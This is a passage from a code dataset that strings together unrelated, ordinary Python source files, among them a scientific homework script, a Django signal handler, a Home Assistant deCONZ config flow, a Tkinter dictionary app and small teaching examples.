random_number_generator # function alias\n\n # set x,y range for sampling\n xmin = 0\n ymin = 0\n xmax = 5\n ymax = 5\n\n # nsats different satellites\n # x_sats,y_sats = random_sampling(f,xmin,xmax,ymin,ymax,nsats,seed)\n r_sats = random_sampling(f,xmin,xmax,ymin,ymax,nsats,seed)[0]\n theta_sats = np.zeros(nsats)\n phi_sats = np.zeros(nsats)\n for i in range(nsats):\n t,seed = rand(seed)\n p,seed = rand(seed) # get next random number\n # multiply by pi, 2pi for polar, azimuthal angle\n theta_sats[i] = np.pi*t\n phi_sats[i] = 2*np.pi*p\n\n return r_sats, theta_sats, phi_sats\n\ndef generate_halo_profile(nsats,nhalos,f,seed):\n \"\"\"generate halo containing satellite galaxies with 3D positions.\n\n halo contains nsats number of satellites\n\n \"\"\"\n\n halos = []\n r = []\n t = []\n p = []\n # np.shape(r) = (nhalos,nsats)\n for i in range(nhalos):\n ra,th,ph = generate_satellite_profile(f,nsats,seed)\n halos.append([ra,th,ph])\n r.append(ra)\n\n # we want all satellites in one big list\n r = np.concatenate(r)\n\n return halos,r\n\ndef rand_thousand_plot(x,x_1):\n fig = plt.figure(figsize=(7,5))\n plt.scatter(x,x_1)\n plt.xlabel('$x_i$',fontsize=14)\n plt.ylabel('$x_{i+1}$',fontsize=14)\n plt.savefig('plt1.png',format='png')\n\ndef rand_million_plot(x_mil):\n fig = plt.figure(figsize=(7,5))\n b = np.linspace(0.0,1.0,20)\n plt.title('1 million random numbers distribution')\n plt.hist(x_mil,color='k',bins=b,histtype='step')\n plt.savefig('plt2.png',format='png')\n\ndef interp1d_plot(x_range,func_vals,interp):\n fig = plt.figure(figsize=(7,5))\n x = x_range\n y = func_vals\n plt.xlabel('$\\log$(x)',fontsize=14)\n plt.ylabel('$\\log$(n)',fontsize=14)\n plt.xscale('log') # log scale for x\n plt.yscale('log') # log scale for y\n plt.scatter(x,y,alpha=0.5,c='b',label='data')\n plt.plot(x,interp,c='k',label='interpolated values')\n plt.legend(frameon=False,loc='best')\n plt.savefig('plt3.png',format='png')\n\ndef halos_plot(f,r,nhalos):\n fig = plt.figure(figsize=(7,5))\n xmin = 1e-4\n xmax = 5\n log_xmin = np.log10(xmin)\n log_xmax = np.log10(xmax)\n b = np.logspace(xmin,xmax,21) # 1e-4, x_max = 5\n data = np.logspace(xmin,xmax,20)\n N_x_dist = np.arange(1.e-4,5,0.001) # 1000 vals\n N_dist = f(N_x_dist)\n bin_vals,bins,patches = plt.hist(r,bins=b,histtype='step')\n plt.cla()\n new_bin_vals = calc_average_number_of_satallites_per_bin(bin_vals,\n bins,\n nhalos)\n plt.title('$\\log$-$\\log$ of N(x)')\n plt.xlabel('$\\log$[x]',fontsize=14)\n plt.ylabel('$\\log$[N(x)]',fontsize=14)\n plt.xscale('log')\n plt.yscale('log')\n plt.plot(N_x_dist,N_dist,c='b')\n plt.hist(data,weights=new_bin_vals,\n bins=b,color='k',histtype='step')\n plt.savefig('plt4.png',format='png')\n# def write_to_file():\n# continue\n\ndef problem_1(seed):\n\n rand = random_number_generator # function alias\n thou = 1000\n mil = 1000000 # np.zeros won't accept 1e6\n\n # 1a\n poisson_out_1 = poisson_dist(1,0)\n poisson_out_2 = poisson_dist(5,10)\n poisson_out_3 = poisson_dist(3,21)\n poisson_out_4 = poisson_dist(2.6,40)\n print('poisson results: {}, {}, {}, {}\\n'.format(poisson_out_1,\n poisson_out_2,\n poisson_out_3,\n poisson_out_4))\n\n # 1b\n x = np.zeros(thou)\n x_1 = np.zeros(thou)\n for i in range(len(x)):\n x[i],seed = rand(seed)\n x_1[i],seed = rand(seed)\n rand_thousand_plot(x,x_1)\n x_mil = np.zeros(mil)\n for i in range(len(x_mil)):\n x_mil[i],seed = rand(seed)\n rand_million_plot(x_mil)\n print('rng plots made.\\n')\n\n\ndef problem_2(seed):\n\n rand = random_number_generator # function alias\n\n # a,b,c are greater than [0,1] from random number generator, so we\n # multiply by (ub-lb)*rand + lb to have a random number in the given range\n # notice: ub/lb --> upper/lower bound\n nhalos = 1000 # number of halos each containing 100 satellites\n nsats = 100 # number of satellites for all of problem 2\n x,seed = rand(seed)\n y,seed = rand(seed)\n z,seed = rand(seed) # x,y,z update the rng for a,b,c constants\n a = 1.4 * x + 1.1\n b = 1.5 * y + 0.5\n c = 2.5 * z + 1.5 # a, b, c used for all of problem 2\n\n # 2a\n # we can reduce the dimensions of the integrand from 3D -> 1D using\n # phi, theta symmetry\n n_r = lambda x: 4*np.pi*x**2*(x/b)**(a-3)*np.e**(-(x/b)**c)\n lower_bound = 0\n upper_bound = 5\n steps = 5\n int_f = calc_integral(n_r,lower_bound,upper_bound,steps)\n A = 1/int_f\n print('constants: A, a, b, c : {}, {}, {}, {}\\n'.format(A,a,b,c))\n\n # 2b\n # list comprehension is faster than for loop and working with tuples is\n # also slightly faster than with lists\n x_range = (1e-4,1e-2,1e-1,1,5)\n xi = np.log10(x_range)\n n_r_vals = [n_r(x) for x in x_range]\n interp = np.interp(xi,x_range,n_r_vals)\n # interp = interp1d_spline(xi,x_range,func_vals)\n interp1d_plot(x_range,n_r_vals,interp)\n print('1D interpolation plotted.\\n')\n\n # 2c\n n_x = lambda x: A*nsats*(x/b)**(a-3)*np.e**(-(x/b)**c)\n dx = calc_derivative(n_x,b)\n analytic_dx = -A*nsats*(c-a+3)/(b*np.e)\n # by hand and confirmed using W-alpha\n print('numerical dn(x)/dx: {}, analytical dn(x)/dx: {}\\n'\\\n .format(np.round(dx,12),np.round(analytic_dx,12)))\n\n # 2d\n halo = generate_satellite_profile(n_x,nsats,seed)\n print('single halo profile in (r,theta,phi) coords.:\\n{}'\\\n .format(halo))\n\n # 2e\n N_x = lambda x: n_x(x)*4*np.pi*x**2\n halos,r = generate_halo_profile(nsats,nhalos,N_x,seed)\n halos_plot(N_x,r,nhalos)\n\n # 2f\n a = 1e-8 # something really close to 0 but not 0\n b = 5\n root = 0.5\n tolerance = 1e-6\n root = calc_roots(N_x,a,b,tolerance,root)\n print('root: {}\\n'.format(root))\n\n # 2g\n # quantiles desired\n p16 = 16\n p50 = 50\n p84 = 84\n r_sorted = halos[0][0] # radial bin of first halo, want it for largest number of galaxies\n quicksort(r_sorted)\n q1 = calc_quantile(r_sorted,p16)\n q2 = calc_quantile(r_sorted,p50)\n q3 = calc_quantile(r_sorted,p84)\n print('16, 50, 84 quantiles: {}, {}, {}'.format(q1,q2,q3))\n\n # 2h normalization and 3d interp\n print('2h not implemented.')\n\ndef problem_3(seed):\n print('this shit hard fam. problem 3 not implemented.')\n\ndef main():\n seed = 0 # random seed for assignment\n\n print('nur assignment 1. beginning, please wait......................\\n')\n\n print('seed is {}\\n'.format(seed))\n # q1 outputs\n problem_1(seed)\n\n # q2 outputs\n problem_2(seed)\n\n # q3 outputs\n problem_3(seed)\n\n print('completed. please take a look at the pdf.\\n')\n\nif __name__ == \"__main__\":\n sys.exit(main())\n","sub_path":"handin1/handin1.py","file_name":"handin1.py","file_ext":"py","file_size_in_byte":19628,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"28318807","text":"# coding:utf-8\n\n# 设置图片验证码的redis有效期\nIMAGE_REDIS_EXPIRES = 180\n\n# 短信验证码的redis有效期, 单位:秒\nSMS_CODE_REDIS_EXPIRES = 300\n\n# 发送短信验证码的间隔, 单位:秒\nSEND_SMS_CODE_INTERVAL = 60\n\n# 设置最多允许错误次数\nLOGIN_ERROR_MAX_TIMES = 5\n\n# 设置输入错误后禁止输入时长\nLOGIN_ERROR_FORBID_TIME = 600\n\n# 七牛的域名\nQINIU_URL_DOMAIN = \"http://o91qujnqh.bkt.clouddn.com/\"\n\n# 城区信息的缓存时间, 单位:秒\nAREA_INFO_REDIS_CACHE_EXPIRES = 7200\n\n\n\n# 房屋列表页面每页数据容量\nHOUSE_LIST_PAGE_CAPACITY = 2\n\n# 房屋列表页面页数缓存时间,单位秒\nHOUES_LIST_PAGE_REDIS_CACHE_EXPIRES = 7200\n\n\n# 首页展示最多的房屋数量\nHOME_PAGE_MAX_HOUSES = 5\n\n# 首页房屋数据的Redis缓存时间,单位:秒\nHOME_PAGE_DATA_REDIS_EXPIRES = 7200\n\n# 房屋详情页展示的评论最大数\nHOUSE_DETAIL_COMMENT_DISPLAY_COUNTS = 30\n\n# 房屋详情页面数据Redis缓存时间,单位:秒\nHOUSE_DETAIL_REDIS_EXPIRE_SECOND = 7200","sub_path":"ihome/constants.py","file_name":"constants.py","file_ext":"py","file_size_in_byte":1032,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"554469160","text":"# _*_ coding:utf-8 _*_\n__author__ = 'imbaqian'\n__date__ = '2018/8/7 14:35'\n\nfrom django.db.models.signals import post_save, post_delete\nfrom django.dispatch import receiver\nfrom.models import UserFav\n\n\n# 用信号量方法增加关注数量, 每增加一个商品的关注,就创建了一个 userfav\n@receiver(post_save, sender=UserFav)\ndef create_userfav(sender, instance=None, created=False, **kwargs):\n if created:\n goods = instance.goods\n goods.fav_num += 1\n goods.save()\n\n\n# # 用信号量方法减少关注数量, 每减少一个商品的关注,就删除了一个 userfav\n@receiver(post_delete, sender=UserFav)\ndef delete_userfav(sender, instance=None, created=False, **kwargs):\n goods = instance.goods\n goods.fav_num -= 1\n goods.save()","sub_path":"apps/user_operation/signal.py","file_name":"signal.py","file_ext":"py","file_size_in_byte":775,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"381835563","text":"\"\"\" Webserver with module example. \"\"\"\n# This file is intended to be run as a cron script. Upon execution, it does\n# it's thing and shuts down.\n\nimport argparse\nimport os\nfrom aiohttp import web\n\nfrom aries_staticagent import StaticConnection, Module, route, utils\n\n\ndef environ_or_required(key):\n \"\"\" Pull arg from environment or require it in args. \"\"\"\n if os.environ.get(key):\n return {'default': os.environ.get(key)}\n\n return {'required': True}\n\n# above from https://stackoverflow.com/questions/10551117/setting-options-from-environment-variables-when-using-argparse\n# Thought: Should we include arg parsing help into the staticagent library?\n\n\ndef config():\n \"\"\" Get StaticConnection parameters from env or command line args. \"\"\"\n parser = argparse.ArgumentParser()\n # endpoint can be http or ws, auto handled by staticagent library.\n parser.add_argument(\n '--endpoint',\n **environ_or_required('ARIES_ENDPOINT')\n )\n parser.add_argument(\n '--endpointkey',\n **environ_or_required('ARIES_ENDPOINT_KEY')\n )\n parser.add_argument(\n '--mypublickey',\n **environ_or_required('ARIES_MY_PUBLIC_KEY')\n )\n parser.add_argument(\n '--myprivatekey',\n **environ_or_required('ARIES_MY_PRIVATE_KEY')\n )\n parser.add_argument(\n '--port',\n **environ_or_required('PORT')\n )\n args = parser.parse_args()\n return args\n\n\nclass BasicMessageCounter(Module):\n \"\"\" A BasicMessage module that responds with the number of messages\n received.\n \"\"\"\n DOC_URI = 'did:sov:BzCbsNYhMrjHiqZDTUASHg;spec/'\n PROTOCOL = 'basicmessage'\n VERSION = '1.0'\n\n def __init__(self):\n super().__init__()\n self.count = 0\n\n @route\n async def message(self, _msg, conn):\n \"\"\" Respond to basic messages with a count of messages received. \"\"\"\n self.count += 1\n await conn.send_async({\n \"@type\": self.type(\"message\"),\n \"~l10n\": {\"locale\": \"en\"},\n \"sent_time\": utils.timestamp(),\n \"content\": \"{} message(s) received.\".format(self.count)\n })\n\n\ndef main():\n \"\"\" Create connection and start web server. \"\"\"\n args = config()\n conn = StaticConnection(\n args.mypublickey,\n args.myprivatekey,\n args.endpointkey,\n args.endpoint,\n )\n\n bmc = BasicMessageCounter()\n conn.route_module(bmc)\n\n async def handle(request):\n \"\"\" aiohttp handle POST. \"\"\"\n await conn.handle(await request.read())\n raise web.HTTPAccepted()\n\n app = web.Application()\n app.add_routes([web.post('/', handle)])\n\n web.run_app(app, port=args.port)\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"examples/webserver_with_module.py","file_name":"webserver_with_module.py","file_ext":"py","file_size_in_byte":2715,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"204434937","text":"from tests.online_test.cases.IntelligenceCountry.test_intelligence_ios import TestIntelligenceIOS\nfrom tests.online_test.cases.IntelligenceCountry.test_intelligence_gp import TestIntelligenceGP\nfrom tests.online_test.cases.IntelligenceCountry.test_intelligence_ua import TestIntelligenceUA\nfrom tests.online_test.cases.IntelligenceCountry.test_intelligence_pub import TestIntelligencePub\nfrom tests.online_test.cases.IntelligenceCountry.test_intelligence_com import TestIntelligenceCom\nfrom tests.online_test.constants.settings import TEST_PROCESS_NUM\nfrom tests.online_test.multi_main.base_task_manager import BaseTaskManager\nfrom tests.online_test.constants.test_simple import MarketSlug\nfrom tests.online_test.multi_main.runner import CaseRunner\n\n\n\n\nclass CountryTaskManager(BaseTaskManager):\n def __init__(self,test_market):\n self.test_market = test_market\n BaseTaskManager.__init__(self)\n\n def _get_case_list(self):\n if self.test_market.lower() == MarketSlug.IOS:\n self._format_case(TestIntelligenceIOS._get_format_parameters())\n elif self.test_market.lower() == MarketSlug.GP:\n self._format_case(TestIntelligenceGP._get_format_parameters())\n elif self.test_market.lower() == MarketSlug.ALL_STORE:\n self._format_case(TestIntelligenceUA._get_format_parameters())\n elif self.test_market.lower() == MarketSlug.PUBLISHER:\n self._format_case(TestIntelligencePub._get_format_parameters())\n elif self.test_market.lower() == MarketSlug.COMPANY:\n self._format_case(TestIntelligenceCom._get_format_parameters())\n else:\n raise('Please add the correct \"TEST_MARKET\"')\n\n def _add_run_to_process(self):\n for i in range(TEST_PROCESS_NUM):\n runner = CaseRunner(self.Result, self.Fault, self.Cases, self.test_market.lower())\n runner.daemon=False\n runner.start()\n self.process_list.append(runner)\n\n","sub_path":"tests/online_test/multi_main/country_task_manager.py","file_name":"country_task_manager.py","file_ext":"py","file_size_in_byte":1967,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"366927158","text":"List = input('请输入需要排序的列表\\n').split()\r\nList = [int(x) for x in List]\r\n\r\n\r\ndef bubblesort(List):\r\n length = len(List)\r\n for i in range(1,length):\r\n flag = 0\r\n for j in range(0,length-i):\r\n if List[j] > List[j+1]:\r\n List[j],List[j+1] = List[j+1],List[j]\r\n flag = 1\r\n if flag == 0:\r\n break\r\n \r\n\r\nbubblesort(List)\r\nprint(List)\r\n","sub_path":"冒泡.py","file_name":"冒泡.py","file_ext":"py","file_size_in_byte":425,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"120026417","text":"import numpy as np\nimport numba\nfrom collections import namedtuple\nfrom tqdm import tqdm\n\ndetections = namedtuple('Detections', ['N_1', 'N_2', 'N_12', 'N_gate'])\n\n\n@numba.njit(parallel=True)\ndef _simulate_detection_classical(rate_1, e_rate_1, rate_2, e_rate_2, N_gate):\n\n N_gate = int(N_gate)\n\n det1 = np.random.random(size=N_gate)\n det2 = np.random.random(size=N_gate)\n err1 = np.random.random(size=N_gate)\n err2 = np.random.random(size=N_gate)\n\n bool1 = det1 < rate_1 / 2\n bool2 = det2 < rate_2 / 2\n\n e_bool1 = err1 < e_rate_1\n e_bool2 = err2 < e_rate_2\n\n bool1 = np.logical_or(bool1, e_bool1)\n bool2 = np.logical_or(bool2, e_bool2)\n\n n_1 = np.sum(bool1)\n n_2 = np.sum(bool2)\n n_12 = np.sum(bool1 * bool2)\n\n return (n_1, n_2, n_12, N_gate)\n\n\n@numba.njit(parallel=True)\ndef _simulate_detection_quantum(rate_1, e_rate_1, rate_2, e_rate_2, N_gate):\n\n N_gate = int(N_gate)\n\n which_way = np.random.random(size=N_gate) > .5\n\n det1 = np.random.random(size=N_gate)\n det2 = np.random.random(size=N_gate)\n err1 = np.random.random(size=N_gate)\n err2 = np.random.random(size=N_gate)\n\n bool1 = np.logical_and(det1 < rate_1, which_way)\n bool2 = np.logical_and(det2 < rate_2, np.logical_not(which_way))\n\n e_bool1 = err1 < e_rate_1\n e_bool2 = err2 < e_rate_2\n\n bool1 = np.logical_or(bool1, e_bool1)\n bool2 = np.logical_or(bool2, e_bool2)\n\n n_1 = np.sum(bool1)\n n_2 = np.sum(bool2)\n n_12 = np.sum(bool1 * bool2)\n\n return (n_1, n_2, n_12, N_gate)\n\n\ndef simulate_detection_classical(*args):\n return detections(*_simulate_detection_classical(*args))\n\n\ndef simulate_detection_quantum(*args):\n return detections(*_simulate_detection_quantum(*args))\n\n\ndef simulate_detections_classical(size, *args):\n n_1_arr = []\n n_2_arr = []\n n_12_arr = []\n n_gate_arr = []\n\n for _ in range(size):\n det = simulate_detection_classical(*args)\n n_1, n_2, n_12, n_gate = det\n n_1_arr.append(n_1)\n n_2_arr.append(n_2)\n n_12_arr.append(n_12)\n n_gate_arr.append(n_gate)\n\n return (detections(np.array(n_1_arr), np.array(n_2_arr),\n np.array(n_12_arr), np.array(n_gate_arr)))\n\n\ndef simulate_detections_quantum(size, *args):\n n_1_arr = []\n n_2_arr = []\n n_12_arr = []\n n_gate_arr = []\n\n for _ in range(size):\n det = simulate_detection_quantum(*args)\n n_1, n_2, n_12, n_gate = det\n n_1_arr.append(n_1)\n n_2_arr.append(n_2)\n n_12_arr.append(n_12)\n n_gate_arr.append(n_gate)\n\n return (detections(np.array(n_1_arr), np.array(n_2_arr),\n np.array(n_12_arr), np.array(n_gate_arr)))\n\n\ndef g_from_detections(*detections):\n\n n_1, n_2, n_12, n_gate = detections\n\n print('starting')\n for N in n_12:\n if N > 0:\n print(N)\n\n return n_12 * n_gate / n_1 / n_2\n\n\ndef simulate_g(*args):\n n_1, n_2, n_12, n_gate = simulate_detection_classical(*args)\n\n g = g_from_detections(n_1, n_2, n_12, n_gate)\n return g\n\n\n# def get_statistics(rates_1=RATES,\n# rates_2=None,\n# number_samples=SAMPLE_SIZE_STATISTIC):\n\n# if rates_2 is None:\n# rates_2 = rates_1\n\n# deviations = []\n# means = []\n\n# for r_1, r_2 in tqdm(zip(rates_1, rates_2)):\n# gs = []\n# for _ in range(number_samples):\n# gs.append(g_from_detections(r_1, r_2))\n# deviations.append(np.std(gs))\n# means.append(np.average(gs))\n\n# return statistics(means, deviations)\n","sub_path":"quantum_optics/single_photon/simulation.py","file_name":"simulation.py","file_ext":"py","file_size_in_byte":3560,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"586078053","text":"from tkinter import *\nfrom tkinter import messagebox\nimport tkinter.font as font\nimport json\nimport platform\nfrom difflib import get_close_matches\n\nroot = Tk()\nroot.title(\"Dictionary v1.0\")\nroot.resizable(False, False)\nroot['background'] = \"#313131\"\n\ndef fetch_data(word):\n # //////////////////// GET OS ////////////////////\n platform_type = platform.system()\n\n # //////////////////// DICTIONARY ////////////////////\n \n if platform_type == 'Windows':\n\n data = json.load(open(r\".\\Data\\data.json\"))\n\n def searchdic(word):\n word = word.lower()\n if word in data:\n return data[word]\n elif word.title() in data:\n return data[word.title()]\n elif word.upper() in data:\n return data[word.upper()]\n elif len(get_close_matches(word, data.keys())) > 0:\n swyon_msg = \"Did you mean \" + get_close_matches(word, data.keys())[0] + \" word instead?\"\n swyon = messagebox.askquestion ('Word Guess',swyon_msg,icon = 'warning')\n if swyon == \"yes\":\n return data[get_close_matches(word, data.keys())[0]]\n elif swyon == \"no\":\n return (\"\\nThe word does not exist! \")\n else:\n return (\"\\nThe word does not exist! \")\n else:\n return \"\\nThe word does not exist\"\n\n output = searchdic(word)\n\n if type(output) == list:\n for item in output:\n tmain.insert(END, \"\\n\\n\" + item)\n print(\"\\n\" + item)\n\n\n else:\n tmain.insert(END, \"\\n\" + output)\n print(output)\n\n\n else:\n\n data = json.load(open(r\"./Data/data.json\"))\n\n def searchdic(word):\n word = word.lower()\n if word in data:\n return data[word]\n elif word.title() in data:\n return data[word.title()]\n elif word.upper() in data:\n return data[word.upper()]\n elif len(get_close_matches(word, data.keys())) > 0:\n swyon_msg = \"Did you mean \" + get_close_matches(word, data.keys())[0] + \" word instead?\"\n swyon = messagebox.askquestion ('Word Guess',swyon_msg,icon = 'warning')\n if swyon == \"yes\":\n return data[get_close_matches(word, data.keys())[0]]\n elif swyon == \"no\":\n return (\"\\nThe word does not exist! \")\n else:\n return (\"\\nThe word does not exist! \")\n else:\n return \"\\nThe word does not exist\"\n\n output = searchdic(word)\n\n if type(output) == list:\n for item in output:\n tmain.insert(END, \"\\n\\n\" + item)\n print(\"\\n\" + item)\n\n\n else:\n tmain.insert(END, \"\\n\" + output)\n print(output)\n\n\ndef clear():\n egword.delete(0, END)\n tmain.delete(\"1.0\", END)\n\ndef save_to_txt():\n current_word = egword.get() + \".txt\"\n current_meaning = tmain.get(\"1.0\", END)\n\n file = open(current_word, \"w+\")\n file.write(current_meaning)\n file.close()\n\ndef search():\n search_word = egword.get()\n fetch_data(search_word)\n \nfontbtn = font.Font(family=\"Arial\", size=\"13\", weight=\"bold\")\n\nltop = Label(root, text=\"Dictionary\", bg=\"#313131\", fg=\"#FFFFFF\")\nltop.grid(row=2, column=0, columnspan=3)\nltop['font'] = font.Font(family=\"Arial\", size=\"15\", weight=\"bold\")\n\negword = Entry(root, bg=\"#C5C5C5\", fg=\"#000000\", width=37, borderwidth=6)\negword.grid(row=3, column=0, columnspan=3, pady=5)\negword['font'] = font.Font(family=\"Arial\", size=\"12\", weight=\"bold\")\n\ntmain = Text(root, height=10, width=40, bg=\"#C5C5C5\", fg=\"#000000\")\ntmain.grid(row=4, column=0, columnspan=3, pady=5)\ntmain['font'] = font.Font(family=\"Arial\", size=\"12\")\n\nbsearch = Button(root, text=\"Search\", command=search, padx=60, bg=\"#007700\", fg=\"#FFFFFF\")\nbsearch.grid(row=5, column=0, columnspan=1)\nbsearch['font'] = fontbtn\n\nbsave = Button(root, text=\"Save\", command=save_to_txt, padx=20, bg=\"#D3A500\", fg=\"#FFFFFF\")\nbsave.grid(row=5, column=1, columnspan=1)\nbsave['font'] = fontbtn\n\nbclear = Button(root, text=\"Clear\", command=clear, padx=20, bg=\"#DC0000\", fg=\"#FFFFFF\")\nbclear.grid(row=5, column=2, columnspan=1)\nbclear['font'] = fontbtn\n\nroot.mainloop()\n","sub_path":"GUI/gui.py","file_name":"gui.py","file_ext":"py","file_size_in_byte":4361,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"377568901","text":"# 此示例示意继承和派生\n\nclass Human(object):\n '''此类用于描述人类的共性行为'''\n def say(self, that):\n print(\"说:\", that)\n def walk(self, distance):\n print(\"走了\", distance, \"公里\")\n\nclass Student(Human):\n # def say(self, that):\n # print(\"说:\", that)\n # def walk(self, distance):\n # print(\"走了\", distance, \"公里\")\n def study(self, subject):\n print(\"正在学习:\", subject)\n\nclass Teacher(Student):\n def teach(self, subject):\n print(\"正在教:\", subject)\n\nh1 = Human()\nh1.say(\"今天真冷!\")\nh1.walk(5)\n\ns1 = Student()\ns1.say(\"学习有点累\")\ns1.walk(3)\ns1.study('python')\n\nt1 = Teacher()\nt1.say(\"明天周五了\")\nt1.walk(6)\nt1.teach('面向对象oop')\nt1.study('python3')\n\n","sub_path":"aid1805/pbase/89_inheritance.py","file_name":"89_inheritance.py","file_ext":"py","file_size_in_byte":785,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"158944662","text":"import os\nfrom pocketsphinx import LiveSpeech, get_model_path\n\nmodel_path = get_model_path()\n\nspeech = LiveSpeech(\n verbose=False,\n sampling_rate=16000,\n buffer_size=1024,\n no_search=False,\n full_utt=False,\n hmm=os.path.join(model_path, 'cmusphinx-en-us-8khz-5.2'),\n lm=os.path.join(model_path, '6618.lm'),\n dic=os.path.join(model_path, '6618.dic')\n)\ndef sphinx():\n for phrase in speech:\n print('返回:',phrase)\n # print(phrase.segments(detailed=True))\n if str(phrase) == 'MOSS':\n print('唤醒')\n return 'wakeup'\n\n# sphinx()","sub_path":"smartZN/wakeup.py","file_name":"wakeup.py","file_ext":"py","file_size_in_byte":598,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"335140433","text":"\"\"\"Config flow to configure deCONZ component.\"\"\"\n\nimport voluptuous as vol\n\nfrom homeassistant import config_entries, data_entry_flow\nfrom homeassistant.core import callback\nfrom homeassistant.const import CONF_API_KEY, CONF_HOST, CONF_PORT\nfrom homeassistant.helpers import aiohttp_client\nfrom homeassistant.util.json import load_json\n\nfrom .const import (\n CONF_ALLOW_DECONZ_GROUPS, CONF_ALLOW_CLIP_SENSOR, CONFIG_FILE, DOMAIN)\n\n\nCONF_BRIDGEID = 'bridgeid'\n\n\n@callback\ndef configured_hosts(hass):\n \"\"\"Return a set of the configured hosts.\"\"\"\n return set(entry.data[CONF_HOST] for entry\n in hass.config_entries.async_entries(DOMAIN))\n\n\n@config_entries.HANDLERS.register(DOMAIN)\nclass DeconzFlowHandler(data_entry_flow.FlowHandler):\n \"\"\"Handle a deCONZ config flow.\"\"\"\n\n VERSION = 1\n\n def __init__(self):\n \"\"\"Initialize the deCONZ config flow.\"\"\"\n self.bridges = []\n self.deconz_config = {}\n\n async def async_step_init(self, user_input=None):\n \"\"\"Handle a deCONZ config flow start.\n\n Only allows one instance to be set up.\n If only one bridge is found go to link step.\n If more than one bridge is found let user choose bridge to link.\n \"\"\"\n from pydeconz.utils import async_discovery\n\n if configured_hosts(self.hass):\n return self.async_abort(reason='one_instance_only')\n\n if user_input is not None:\n for bridge in self.bridges:\n if bridge[CONF_HOST] == user_input[CONF_HOST]:\n self.deconz_config = bridge\n return await self.async_step_link()\n\n session = aiohttp_client.async_get_clientsession(self.hass)\n self.bridges = await async_discovery(session)\n\n if len(self.bridges) == 1:\n self.deconz_config = self.bridges[0]\n return await self.async_step_link()\n elif len(self.bridges) > 1:\n hosts = []\n for bridge in self.bridges:\n hosts.append(bridge[CONF_HOST])\n return self.async_show_form(\n step_id='init',\n data_schema=vol.Schema({\n vol.Required(CONF_HOST): vol.In(hosts)\n })\n )\n\n return self.async_abort(\n reason='no_bridges'\n )\n\n async def async_step_link(self, user_input=None):\n \"\"\"Attempt to link with the deCONZ bridge.\"\"\"\n from pydeconz.utils import async_get_api_key\n errors = {}\n\n if user_input is not None:\n if configured_hosts(self.hass):\n return self.async_abort(reason='one_instance_only')\n session = aiohttp_client.async_get_clientsession(self.hass)\n api_key = await async_get_api_key(session, **self.deconz_config)\n if api_key:\n self.deconz_config[CONF_API_KEY] = api_key\n return await self.async_step_options()\n errors['base'] = 'no_key'\n\n return self.async_show_form(\n step_id='link',\n errors=errors,\n )\n\n async def async_step_options(self, user_input=None):\n \"\"\"Extra options for deCONZ.\n\n CONF_CLIP_SENSOR -- Allow user to choose if they want clip sensors.\n CONF_DECONZ_GROUPS -- Allow user to choose if they want deCONZ groups.\n \"\"\"\n from pydeconz.utils import async_get_bridgeid\n\n if user_input is not None:\n self.deconz_config[CONF_ALLOW_CLIP_SENSOR] = \\\n user_input[CONF_ALLOW_CLIP_SENSOR]\n self.deconz_config[CONF_ALLOW_DECONZ_GROUPS] = \\\n user_input[CONF_ALLOW_DECONZ_GROUPS]\n\n if CONF_BRIDGEID not in self.deconz_config:\n session = aiohttp_client.async_get_clientsession(self.hass)\n self.deconz_config[CONF_BRIDGEID] = await async_get_bridgeid(\n session, **self.deconz_config)\n\n return self.async_create_entry(\n title='deCONZ-' + self.deconz_config[CONF_BRIDGEID],\n data=self.deconz_config\n )\n\n return self.async_show_form(\n step_id='options',\n data_schema=vol.Schema({\n vol.Optional(CONF_ALLOW_CLIP_SENSOR): bool,\n vol.Optional(CONF_ALLOW_DECONZ_GROUPS): bool,\n }),\n )\n\n async def async_step_discovery(self, discovery_info):\n \"\"\"Prepare configuration for a discovered deCONZ bridge.\n\n This flow is triggered by the discovery component.\n \"\"\"\n deconz_config = {}\n deconz_config[CONF_HOST] = discovery_info.get(CONF_HOST)\n deconz_config[CONF_PORT] = discovery_info.get(CONF_PORT)\n deconz_config[CONF_BRIDGEID] = discovery_info.get('serial')\n\n config_file = await self.hass.async_add_job(\n load_json, self.hass.config.path(CONFIG_FILE))\n if config_file and \\\n config_file[CONF_HOST] == deconz_config[CONF_HOST] and \\\n CONF_API_KEY in config_file:\n deconz_config[CONF_API_KEY] = config_file[CONF_API_KEY]\n\n return await self.async_step_import(deconz_config)\n\n async def async_step_import(self, import_config):\n \"\"\"Import a deCONZ bridge as a config entry.\n\n This flow is triggered by `async_setup` for configured bridges.\n This flow is also triggered by `async_step_discovery`.\n\n This will execute for any bridge that does not have a\n config entry yet (based on host).\n\n If an API key is provided, we will create an entry.\n Otherwise we will delegate to `link` step which\n will ask user to link the bridge.\n \"\"\"\n if configured_hosts(self.hass):\n return self.async_abort(reason='one_instance_only')\n\n self.deconz_config = import_config\n if CONF_API_KEY not in import_config:\n return await self.async_step_link()\n\n self.deconz_config[CONF_ALLOW_CLIP_SENSOR] = True\n self.deconz_config[CONF_ALLOW_DECONZ_GROUPS] = True\n return self.async_create_entry(\n title='deCONZ-' + self.deconz_config[CONF_BRIDGEID],\n data=self.deconz_config\n )\n","sub_path":"homeassistant/components/deconz/config_flow.py","file_name":"config_flow.py","file_ext":"py","file_size_in_byte":6165,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"223238703","text":"# -*- coding: utf-8 -*-\n\"\"\"\nImage correlation and related functions\n=======================================\n\"\"\"\nfrom functools import partial\nimport numpy as np\nfrom scipy.fftpack import next_fast_len\n\nFFTOPS = {}\ntry:\n from pyfftw.interfaces.numpy_fft import rfft2, irfft2\n FFTOPS['threads'] = 2\nexcept ImportError:\n from 